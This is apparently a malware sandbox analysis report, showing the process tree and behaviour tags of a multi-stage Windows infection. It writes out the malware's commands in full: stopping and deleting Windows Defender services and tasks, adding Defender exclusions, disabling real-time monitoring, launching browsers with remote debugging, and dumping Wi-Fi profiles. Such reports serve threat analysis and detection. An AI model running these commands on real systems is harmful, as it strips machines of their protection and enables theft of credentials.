        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7E43.tmp\7E44.tmp\7E45.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
        11⤵
        Drops file in Program Files directory
        
        PID:5348
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        12⤵
        Launches sc.exe
        
        PID:536
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        12⤵
        Launches sc.exe
        
        PID:228
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        12⤵
        Loads dropped DLL
        Delays execution with timeout.exe
        
        PID:4828
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        12⤵
        Launches sc.exe
        
        PID:5356
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        12⤵
        
        PID:756
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        12⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4928
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        12⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:688
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        12⤵
        Launches sc.exe
        
        PID:5772
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        12⤵
        Launches sc.exe
        
        PID:1444
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        12⤵
        
        PID:4872
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        12⤵
        
        PID:2572
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        12⤵
        Launches sc.exe
        
        PID:4216
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        12⤵
        
        PID:116
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        12⤵
        Launches sc.exe
        
        PID:4712
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        12⤵
        Launches sc.exe
        
        PID:2960
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        12⤵
        
        PID:3020
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        12⤵
        Launches sc.exe
        
        PID:404
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        12⤵
        
        PID:2060
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        12⤵
        
        PID:1288
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        12⤵
        Launches sc.exe
        
        PID:4968
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        12⤵
        Launches sc.exe
        
        PID:4640
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        12⤵
        
        PID:6112
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        12⤵
        Launches sc.exe
        
        PID:4980
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        12⤵
        Launches sc.exe
        
        PID:3968
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        12⤵
        
        PID:5488
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        12⤵
        
        PID:5688
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        12⤵
        Launches sc.exe
        
        PID:2668
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        12⤵
        
        PID:2300
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        12⤵
        Launches sc.exe
        
        PID:2220
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        12⤵
        Launches sc.exe
        
        PID:5692
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        12⤵
        
        PID:4404
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        12⤵
        
        PID:4264
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        12⤵
        Launches sc.exe
        
        PID:436
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        12⤵
        
        PID:2056
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        12⤵
        
        PID:5516
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        12⤵
        Launches sc.exe
        
        PID:3540
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        12⤵
        
        PID:5524
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        12⤵
        Launches sc.exe
        
        PID:5500
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        12⤵
        Launches sc.exe
        
        PID:4344
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        12⤵
        
        PID:5916
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        12⤵
        Launches sc.exe
        
        PID:5820
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        12⤵
        
        PID:3448
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        12⤵
        
        PID:3960
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        12⤵
        Launches sc.exe
        
        PID:5420
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        12⤵
        Launches sc.exe
        
        PID:2480
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        12⤵
        
        PID:1572
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        12⤵
        
        PID:3988
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        12⤵
        
        PID:5496
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        12⤵
        
        PID:428
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        12⤵
        Launches sc.exe
        
        PID:5528
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        12⤵
        Launches sc.exe
        
        PID:4708
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        12⤵
        
        PID:2240
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        12⤵
        Launches sc.exe
        
        PID:212
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        12⤵
        Launches sc.exe
        
        PID:4088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        12⤵
        
        PID:964
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        12⤵
        
        PID:5808
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        12⤵
        
        PID:4912
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        12⤵
        
        PID:5180
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        12⤵
        
        PID:4564
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        12⤵
        Launches sc.exe
        
        PID:3428
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        12⤵
        Launches sc.exe
        
        PID:5380
        
        C:\Users\Admin\AppData\Local\Temp\10392490101\1f9e17497b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392490101\1f9e17497b.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:4404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        8⤵
        Uses browser remote debugging
        Loads dropped DLL
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5564
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa387cdcf8,0x7ffa387cdd04,0x7ffa387cdd10
        9⤵
        Loads dropped DLL
        
        PID:1572
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,12102657262290914196,15378062915385414900,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2508 /prefetch:3
        9⤵
        Loads dropped DLL
        
        PID:4860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2532,i,12102657262290914196,15378062915385414900,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2500 /prefetch:2
        9⤵
        
        PID:1324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2060,i,12102657262290914196,15378062915385414900,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2620 /prefetch:8
        9⤵
        
        PID:1144
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,12102657262290914196,15378062915385414900,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3256 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,12102657262290914196,15378062915385414900,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3284 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3232
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4200,i,12102657262290914196,15378062915385414900,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4236 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:5152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4620,i,12102657262290914196,15378062915385414900,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4664 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3840
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5240,i,12102657262290914196,15378062915385414900,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5252 /prefetch:8
        9⤵
        
        PID:4640
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        8⤵
        Uses browser remote debugging
        Loads dropped DLL
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:3884
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7ffa25e3f208,0x7ffa25e3f214,0x7ffa25e3f220
        9⤵
        Loads dropped DLL
        
        PID:4580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1912,i,3537829122150900494,11707176653908322490,262144 --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:3
        9⤵
        Loads dropped DLL
        
        PID:2080
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2068,i,3537829122150900494,11707176653908322490,262144 --variations-seed-version --mojo-platform-channel-handle=2056 /prefetch:2
        9⤵
        
        PID:3932
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2396,i,3537829122150900494,11707176653908322490,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:8
        9⤵
        
        PID:2988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3504,i,3537829122150900494,11707176653908322490,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,3537829122150900494,11707176653908322490,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4868
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5116,i,3537829122150900494,11707176653908322490,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:8
        9⤵
        
        PID:6324
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5016,i,3537829122150900494,11707176653908322490,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:8
        9⤵
        
        PID:6316
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5416,i,3537829122150900494,11707176653908322490,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:8
        9⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Local\Temp\10392500101\07d0c5035d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392500101\07d0c5035d.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392500101\07d0c5035d.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\10392510101\fc4df60a0c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392510101\fc4df60a0c.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:6732
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392510101\fc4df60a0c.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6996
        
        C:\Users\Admin\AppData\Local\Temp\10392520101\FOm9tvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392520101\FOm9tvc.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6772
        
        C:\Users\Admin\AppData\Local\Temp\10392530101\bprz1VA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392530101\bprz1VA.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe
        
        "C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        8⤵
        Executes dropped EXE
        
        PID:6464
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        9⤵
        Executes dropped EXE
        
        PID:6688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        10⤵
        
        PID:5908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        10⤵
        
        PID:5016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:2400
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        
        PID:4176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        10⤵
        
        PID:6152
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        11⤵
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4820
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:888
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:6500
        
        C:\Users\Admin\AppData\Local\Temp\10392540101\b35e26dfa6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392540101\b35e26dfa6.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:6488
        
        C:\Users\Admin\AppData\Local\Temp\10392550101\2b3f7991fc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392550101\2b3f7991fc.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5928
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 724
        8⤵
        Program crash
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\10392560101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392560101\7IIl2eE.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:6956
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\10392570101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392570101\Rm3cVPI.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\10392580101\SPOKz5U.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392580101\SPOKz5U.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5424
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\10392590101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392590101\EPTwCQd.exe"
        7⤵
        
        PID:6516
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:5820
        
        C:\Users\Admin\AppData\Local\Temp\10392600101\z85yd_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392600101\z85yd_003.exe"
        7⤵
        
        PID:2980
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1544
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        8⤵
        
        PID:3496
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        9⤵
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        9⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\10392610101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392610101\TbV75ZR.exe"
        7⤵
        
        PID:4492
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:1516
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 476
        9⤵
        Program crash
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\10392620101\nAM5wkr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392620101\nAM5wkr.exe"
        7⤵
        
        PID:7484
        
        C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
        
        "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"
        8⤵
        
        PID:8056
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4864
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:2108
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
